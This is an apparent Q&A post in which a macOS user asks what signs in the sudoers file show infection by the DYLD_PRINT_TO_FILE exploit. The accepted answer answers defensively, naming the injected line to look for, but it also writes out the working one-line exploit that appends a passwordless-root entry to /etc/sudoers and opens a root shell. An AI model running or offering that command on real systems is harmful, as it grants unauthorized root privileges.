# DYLD_PRINT_TO_FILE & sudoers Exploit: What are the markers in the sudoers file?

Tags: macos

I am concerned about the DYLD_PRINT_TO_FILE exploit in the sudoers file.

https://blog.malwarebytes.org/mac/2015/08/dyld_print_to_file-exploit-found-in-the-wild/

If I have my sudoers file open, what are the markers I should be looking for as a sign of infection? My sudoers file is actually quite small and too my (mostly untrained) eye, I don't see anything that would be a concern. But what are some examples of lines/variables that would indicate a problem?

Here's is the bottom half of my file, nothing there jumps out at me. Thoughts?

```
# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel    ALL=(ALL) ALL

# Same thing without a password
# %wheel    ALL=(ALL) NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
```

Answer (score 1, accepted):

This is the infecting command:

```
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
```

This means, that you'll have line like:

```
USERNAME ALL=(ALL) NOPASSWD:ALL
```

at the end of your `sudoers` file.

NOTE: `USERNAME` is your username in the system. It won't have hash tag `#` in front.